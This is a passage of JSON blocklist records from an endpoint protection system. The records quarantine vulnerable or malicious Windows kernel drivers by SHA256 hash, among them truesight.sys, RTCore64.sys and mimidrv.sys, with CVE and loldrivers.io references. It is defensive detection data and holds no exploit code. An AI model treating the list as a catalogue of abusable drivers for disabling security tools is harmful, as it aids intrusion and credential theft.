+ "id": "47af286e-82b8-5ed2-8f97-ff83ded88a8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830634Z",
+ "creation_date": "2026-03-23T11:45:30.830635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b19f6fac202bb7f878a79d1be3f8631e5dff44560692235f31deb68710148bec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "47d3467b-4e82-5941-817e-eaff6e052a0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150142Z",
+ "creation_date": "2026-03-23T11:45:31.150144Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150149Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee768d53efcca87b44c6d6b0e306059acef1a481aa5e02694b8a353890cbf6f9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "47eafdb3-ec10-58cb-800c-26f4596fd205",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477898Z",
+ "creation_date": "2026-03-23T11:45:31.477902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477913Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82d6dc7fae155d0589a55a88a1f91d2ca48f7aaff316390eb70f7598eb1cb659",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "47ec7d52-a4df-5b2f-aa92-c188d6e37d52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974557Z",
+ "creation_date": "2026-03-23T11:45:29.974559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a553ba125adf00a769718d5cd26ed1a59b5e397956ebc6163973b10fe8c58214",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "47f34d50-d3bc-5bfe-ada1-766c5049aa54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144020Z",
+ "creation_date": "2026-03-23T11:45:31.144022Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be3eff65d045b8da69a4fff97851914c9593b28eb0e1341752c2b5b6a77b3e60",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "47f47acb-0eeb-5f94-b6dd-bcdce46a3c07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833561Z",
+ "creation_date": "2026-03-23T11:45:30.833564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833573Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54244d2b495401912a0f7957e11f9b9a275e10237fc2b37c899e453993f3fa33",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "47ffc318-34ec-5cca-8272-5d0a36307a97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824203Z",
+ "creation_date": "2026-03-23T11:45:30.824205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d52cb77b427ddb1227990d84e670ec4d1dd3e5c87ffe18567fd384eab09ec6ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "481457c6-2042-5d84-a37e-4bcf33c2ec79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823967Z",
+ "creation_date": "2026-03-23T11:45:30.823969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e545e92fbb223dee4b62ff7f9ae11ad06ff36be47b6ca9eb4f40bf6f08de8d21",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "482b0e84-f935-5bed-a66a-76ba67939a18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144037Z",
+ "creation_date": "2026-03-23T11:45:32.144039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3d48dddef790a45ef9feaa5978ec90c9cd4b2de4746896c446ffa08d488170a",
+ "comment": "Malicious Kernel Driver (aka driver_c3d48ddd.sys) [https://www.loldrivers.io/drivers/f6c08b8a-1d25-4bf1-9d4f-5368c1f6cfe7/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "482b9f57-75f4-5c0c-bce6-3bb7c5ce2388",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969558Z",
+ "creation_date": "2026-03-23T11:45:29.969560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4680fabf606d6580893434e81c130ff7ec9467a15e6534692443465f264d3c9",
+ "comment": "Vulnerable Kernel Driver (aka HpPortIox64.sys) [https://www.loldrivers.io/drivers/13637210-2e1c-45a4-9f76-fe38c3c34264/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48364e33-fabb-5d9f-97ea-ccfc5eabf618",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481151Z",
+ "creation_date": "2026-03-23T11:45:30.481153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34f26fbfb72329cbb7f25d2b40cb0f553e1a80373972bcdad62c3c6284d5b2b1",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4852904d-6fe6-5184-8cfc-08fd494f03ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828547Z",
+ "creation_date": "2026-03-23T11:45:31.828549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ea8dd91131592f6017578965305a4caf61e7430e8d2c31ef823e2da45a93a7f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4858ebcf-be21-5624-bffb-4d039a11658d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826629Z",
+ "creation_date": "2026-03-23T11:45:31.826631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85c83185fc68bf096dad74ab1264417c4f223116e5053043d05bff4b7414b7ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "485b4a24-14e8-508f-a5c3-6b068ee699ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478910Z",
+ "creation_date": "2026-03-23T11:45:31.478914Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b3013268634b4bac0fd3f7ab36c71be8f858c767c5955577ddfe91b5ad22e78",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4860f692-8954-57a0-bfd9-b649e9a60546",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828779Z",
+ "creation_date": "2026-03-23T11:45:31.828783Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828791Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9450aa820c5a58e5786861e4c5f3df3c96939844a9f134e6b190e71d0ab098f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4870a635-d182-5af1-b01b-3f4c82e68157",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985251Z",
+ "creation_date": "2026-03-23T11:45:29.985253Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985258Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd53f7e910ed37bf11a473c116fc33d7799f25213dd4e0191085040eb45c3e4e",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48715460-90b7-5f09-8c2e-1b5002af8fac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975974Z",
+ "creation_date": "2026-03-23T11:45:29.975976Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975982Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "487ada8e-895f-5e5a-91f6-6784419a6c68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979955Z",
+ "creation_date": "2026-03-23T11:45:29.979958Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979967Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd8a5313bf63f5013dc126620276fb4f0ef26416db48ee88cbaaca4029df1d73",
+ "comment": "Vulnerable Kernel Driver (aka nt3.sys) [https://www.loldrivers.io/drivers/d5118882-6cdd-4b06-8bf4-e9818f16137e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "487c563a-517b-5ac7-b02d-c41443bf20ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469340Z",
+ "creation_date": "2026-03-23T11:45:30.469343Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29b3f3f315179d30fbe75de7b59f09bc7452e6b538ff02b5252c3ee7b26eccab",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "487f66f2-e6a4-5d7e-8cd7-33d9656a7c8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468227Z",
+ "creation_date": "2026-03-23T11:45:30.468231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468240Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ffba52ea8bba7aeaf9fb32e1ba97b5bbd5c31739d594e722d9e89907dbb5cdd",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4887ca8e-4fde-5c0b-af84-6374e77f189a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607526Z",
+ "creation_date": "2026-03-23T11:45:29.607528Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18712a063574bfec315d58577dfe413ab45b650e54747d1e18a56c3c7337a12c",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "488cc101-b4c4-5838-8a6f-2b030729e9ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973165Z",
+ "creation_date": "2026-03-23T11:45:29.973167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973172Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d378162a47648bed192270ab4ddd67c99b4ebe8093a267fa1fe1e092559504b0",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "48a52304-d193-5e83-9d5d-026ae04be497",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
